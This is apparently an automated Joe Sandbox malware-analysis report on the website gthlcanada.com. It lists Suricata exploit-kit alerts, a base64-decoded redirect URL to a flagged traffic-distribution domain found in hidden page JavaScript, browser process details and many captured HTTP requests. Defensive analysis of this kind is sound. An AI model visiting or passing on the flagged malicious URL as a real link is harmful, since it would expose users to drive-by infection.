Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://gthlcanada.com

Overview

General Information

Sample URL:https://gthlcanada.com
Analysis ID:1590286
Infos:

Detection

Score:48
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Suricata IDS alerts for network traffic
HTML page contains hidden javascript code

Classification

  • System is w10x64native
  • chrome.exe (PID: 6892 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: BB7C48CDDDE076E7EB44022520F40F77)
    • chrome.exe (PID: 1400 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-subproc-heap-profiling --field-trial-handle=2228,i,10958599467247571731,13053128540631272863,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20240909-180142.416000 --mojo-platform-channel-handle=2256 /prefetch:3 MD5: BB7C48CDDDE076E7EB44022520F40F77)
  • chrome.exe (PID: 1780 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://gthlcanada.com" MD5: BB7C48CDDDE076E7EB44022520F40F77)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-13T22:01:16.612707+010020571521Exploit Kit Activity Detected192.168.11.20611301.1.1.153UDP
2025-01-13T22:01:16.612796+010020571521Exploit Kit Activity Detected192.168.11.20650611.1.1.153UDP
2025-01-13T22:01:18.892339+010020571521Exploit Kit Activity Detected192.168.11.20495951.1.1.153UDP
2025-01-13T22:01:18.892449+010020571521Exploit Kit Activity Detected192.168.11.20508491.1.1.153UDP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-13T22:01:18.380854+010020571531Exploit Kit Activity Detected192.168.11.2049876176.53.147.97443TCP
2025-01-13T22:01:20.449975+010020571531Exploit Kit Activity Detected192.168.11.2049923176.53.147.97443TCP

Click to jump to signature section

Show All Signature Results
Source: https://gthlcanada.com/HTTP Parser: Base64 decoded: https://loopconstruct.com/6ljJxaQCuR5NzGsVTDoIlQAhudWke8oUmB-zufTHyLNw
Source: https://gthlcanada.com/HTTP Parser: No favicon
Source: https://gthlcanada.com/HTTP Parser: No favicon
Source: https://gthlcanada.com/HTTP Parser: No favicon
Source: https://gthlcanada.com/HTTP Parser: No favicon
Source: https://gthlcanada.com/HTTP Parser: No favicon
Source: https://gthlcanada.com/HTTP Parser: No favicon
Source: https://gthlcanada.com/HTTP Parser: No favicon
Source: https://gthlcanada.com/HTTP Parser: No favicon
Source: https://gthlcanada.com/HTTP Parser: No favicon
Source: https://gthlcanada.com/HTTP Parser: No favicon
Source: https://gthlcanada.com/HTTP Parser: No favicon
Source: https://gthlcanada.com/HTTP Parser: No favicon
Source: https://gthlcanada.com/HTTP Parser: No <meta name="author".. found
Source: https://gthlcanada.com/HTTP Parser: No <meta name="author".. found
Source: https://gthlcanada.com/HTTP Parser: No <meta name="author".. found
Source: https://gthlcanada.com/HTTP Parser: No <meta name="author".. found
Source: https://gthlcanada.com/HTTP Parser: No <meta name="copyright".. found
Source: https://gthlcanada.com/HTTP Parser: No <meta name="copyright".. found
Source: https://gthlcanada.com/HTTP Parser: No <meta name="copyright".. found
Source: https://gthlcanada.com/HTTP Parser: No <meta name="copyright".. found
Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\scoped_dir6892_874041633Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\chrome_BITS_6892_1078503199Jump to behavior
Source: unknownHTTPS traffic detected: 176.53.147.97:443 -> 192.168.11.20:49876 version: TLS 1.2
Source: unknownHTTPS traffic detected: 176.53.147.97:443 -> 192.168.11.20:49923 version: TLS 1.2

Networking

barindex
Source: Network trafficSuricata IDS: 2057152 - Severity 1 - ET EXPLOIT_KIT Malicious TDS Domain in DNS Lookup (loopconstruct .com) : 192.168.11.20:65061 -> 1.1.1.1:53
Source: Network trafficSuricata IDS: 2057152 - Severity 1 - ET EXPLOIT_KIT Malicious TDS Domain in DNS Lookup (loopconstruct .com) : 192.168.11.20:61130 -> 1.1.1.1:53
Source: Network trafficSuricata IDS: 2057153 - Severity 1 - ET EXPLOIT_KIT Malicious TDS Domain in TLS SNI (loopconstruct .com) : 192.168.11.20:49876 -> 176.53.147.97:443
Source: Network trafficSuricata IDS: 2057152 - Severity 1 - ET EXPLOIT_KIT Malicious TDS Domain in DNS Lookup (loopconstruct .com) : 192.168.11.20:50849 -> 1.1.1.1:53
Source: Network trafficSuricata IDS: 2057152 - Severity 1 - ET EXPLOIT_KIT Malicious TDS Domain in DNS Lookup (loopconstruct .com) : 192.168.11.20:49595 -> 1.1.1.1:53
Source: Network trafficSuricata IDS: 2057153 - Severity 1 - ET EXPLOIT_KIT Malicious TDS Domain in TLS SNI (loopconstruct .com) : 192.168.11.20:49923 -> 176.53.147.97:443
Source: unknownTCP traffic detected without corresponding DNS query: 23.54.127.209
Source: unknownTCP traffic detected without corresponding DNS query: 142.251.179.94
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.21.237
Source: unknownTCP traffic detected without corresponding DNS query: 23.54.127.209
Source: unknownTCP traffic detected without corresponding DNS query: 142.251.179.94
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.151.69
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.151.69
Source: unknownUDP traffic detected without corresponding DNS query: 239.255.255.250
Source: unknownUDP traffic detected without corresponding DNS query: 239.255.255.250
Source: unknownUDP traffic detected without corresponding DNS query: 239.255.255.250
Source: unknownUDP traffic detected without corresponding DNS query: 239.255.255.250
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: gthlcanada.comConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/plugins/sitepress-multilingual-cms/res/css/language-selector.css?v=3.3.5 HTTP/1.1Host: gthlcanada.comConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _icl_current_language=en
Source: global trafficHTTP traffic detected: GET /app/plugins/latest_news/public/css/latest-news-public.css?ver=1.0.0 HTTP/1.1Host: gthlcanada.comConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _icl_current_language=en
Source: global trafficHTTP traffic detected: GET /app/plugins/tagged_content_blocks/public/css/tagged-content-blocks-public.css?ver=1.0.0 HTTP/1.1Host: gthlcanada.comConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _icl_current_language=en
Source: global trafficHTTP traffic detected: GET /app/plugins/wp-polls/polls-css.css?ver=2.7 HTTP/1.1Host: gthlcanada.comConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _icl_current_language=en
Source: global trafficHTTP traffic detected: GET /app/plugins/wpml-cms-nav/res/css/navigation.css?ver=1.4.15 HTTP/1.1Host: gthlcanada.comConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _icl_current_language=en
Source: global trafficHTTP traffic detected: GET /app/plugins/wpml-cms-nav/res/css/cms-navigation-base.css?ver=1.4.15 HTTP/1.1Host: gthlcanada.comConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _icl_current_language=en
Source: global trafficHTTP traffic detected: GET /recaptcha/api.js HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIlKHLAQic/swBCIWgzQEI1r3OARjBy8wBSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
Source: global trafficHTTP traffic detected: GET /app/plugins/wpml-cms-nav/res/css/cms-navigation.css?ver=1.4.15 HTTP/1.1Host: gthlcanada.comConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _icl_current_language=en
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2019/09/05144420/GTHL_Header17-G-1024x200-1024x200.jpg HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2024/08/29093928/icons8-facebook-48-1.png HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/themes/base/assets/dist/css/core.css HTTP/1.1Host: gthlcanada.comConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _icl_current_language=en
Source: global trafficHTTP traffic detected: GET /app/themes/gthl/assets/dist/css/theme.css HTTP/1.1Host: gthlcanada.comConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _icl_current_language=en
Source: global trafficHTTP traffic detected: GET /wp/wp-includes/js/jquery/jquery.js?ver=1.12.4 HTTP/1.1Host: gthlcanada.comConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _icl_current_language=en
Source: global trafficHTTP traffic detected: GET /wp/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1 HTTP/1.1Host: gthlcanada.comConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _icl_current_language=en
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2024/08/29093927/icons8-twitterx-48-1.png HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /recaptcha/api.js HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIlKHLAQic/swBCIWgzQEI1r3OARjBy8wBSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
Source: global trafficHTTP traffic detected: GET /app/plugins/latest_news/public/js/latest-news-public.js?ver=1.0.0 HTTP/1.1Host: gthlcanada.comConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _icl_current_language=en
Source: global trafficHTTP traffic detected: GET /app/plugins/tagged_content_blocks/public/js/tagged-content-blocks-public.js?ver=1.0.0 HTTP/1.1Host: gthlcanada.comConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _icl_current_language=en
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2024/08/29093928/icons8-facebook-48-1.png HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2024/08/29093928/icons8-instagram-48-1.png HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2019/09/05144420/GTHL_Header17-G-1024x200-1024x200.jpg HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/themes/base/bower_components/lodash/lodash.min.js HTTP/1.1Host: gthlcanada.comConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _icl_current_language=en
Source: global trafficHTTP traffic detected: GET /app/themes/base/assets/scripts/js/slick.js HTTP/1.1Host: gthlcanada.comConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _icl_current_language=en
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2024/08/29093927/icons8-youtube-48-1.png HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2024/08/29093927/icons8-twitterx-48-1.png HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2024/08/29093928/icons8-instagram-48-1.png HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/plugins/tagged_content_blocks/public/js/tagged-content-blocks-public.js?ver=1.0.0 HTTP/1.1Host: gthlcanada.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _icl_current_language=en
Source: global trafficHTTP traffic detected: GET /wp/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1 HTTP/1.1Host: gthlcanada.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _icl_current_language=en
Source: global trafficHTTP traffic detected: GET /app/plugins/latest_news/public/js/latest-news-public.js?ver=1.0.0 HTTP/1.1Host: gthlcanada.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _icl_current_language=en
